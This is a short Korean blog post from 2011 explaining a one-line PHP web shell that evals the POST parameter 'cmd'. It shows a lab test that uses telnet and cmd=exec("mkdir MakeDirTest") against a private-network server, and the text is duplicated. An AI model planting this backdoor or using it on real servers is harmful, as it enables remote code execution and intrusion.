O.S & Script & Programming
한 줄짜리 웹쉘의 사용법
도시형닌자
2011. 2. 10. 11:04
한줄 짜리 웹쉘은 아래처럼 생겼다.
<?php eval($_POST[cmd])?>
참 실행시키고 싶은 욕망이 불러져 온다.
먼저 eval 이라는 녀석은 eval ( string code_str) 이렇게 사용이 되며,
간단하게 string code를 파라미터로 받아서 php 코드에서 명령어를 수행할 수 있는 녀석으로
생각하면 된다.
그리하여 실행해 보았다.
Webserver : 192.168.137.100:80
공격 수행 :
1. telnet 192.168.137.100 80
2. 헤더 + 한줄 + cmd=exec("mkdir MakeDirTest");
헤더 다음에 한줄은 method가 POST이므로 꼭 필요하다.
그럼 200 ok가 떨어진다
공격 수행 후 확인해 보면 정확히 MakeDirTest라는 폴더가 Web_root에 만들어 진것을 확인할 수 있다.
<?php eval($_POST[cmd])?>
참 실행시키고 싶은 욕망이 불러져 온다.
먼저 eval 이라는 녀석은 eval ( string code_str) 이렇게 사용이 되며,
간단하게 string code를 파라미터로 받아서 php 코드에서 명령어를 수행할 수 있는 녀석으로
생각하면 된다.
그리하여 실행해 보았다.
Webserver : 192.168.137.100:80
공격 수행 :
1. telnet 192.168.137.100 80
2. 헤더 + 한줄 + cmd=exec("mkdir MakeDirTest");
헤더 다음에 한줄은 method가 POST이므로 꼭 필요하다.
공격 수행 후 확인해 보면 정확히 MakeDirTest라는 폴더가 Web_root에 만들어 진것을 확인할 수 있다.